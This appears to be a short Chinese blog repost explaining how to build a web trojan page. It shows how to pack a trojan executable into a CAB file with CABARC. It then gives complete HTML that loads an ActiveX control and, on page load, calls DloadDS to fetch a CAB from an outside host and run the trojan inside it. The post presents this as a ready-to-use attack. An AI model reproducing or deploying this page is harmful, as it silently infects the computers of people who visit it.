鬼仔's Blog

来源：7jdg's blog

百度网马的时想要用到,CAB文件封装器CABARC

Usage: CABARC [options] command cabfile [@list] [files] [dest_dir]

Commands:
L List contents of cabinet (e.g. cabarc l test.cab)
N Create new cabinet (e.g. cabarc n test.cab *.c app.mak *.h)
X Extract file(s) from cabinet (e.g. cabarc x test.cab foo*.c)

例如:cabarc n calc.cab muma.exe

就会把muma.exe压缩为calc.cab文件

下面是网马,calc.exe是cab文件里的木马文件,细看cocoruder大叔的文档就明白了
XML/HTML代码

<html>
<head>
<script>
function DowndloadCalcAndRun()
{
com.DloadDS("http://ruder.cdut.net/attach/calc.cab", "calc.exe", 0);
}
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>


下载：cab文件封装器.rar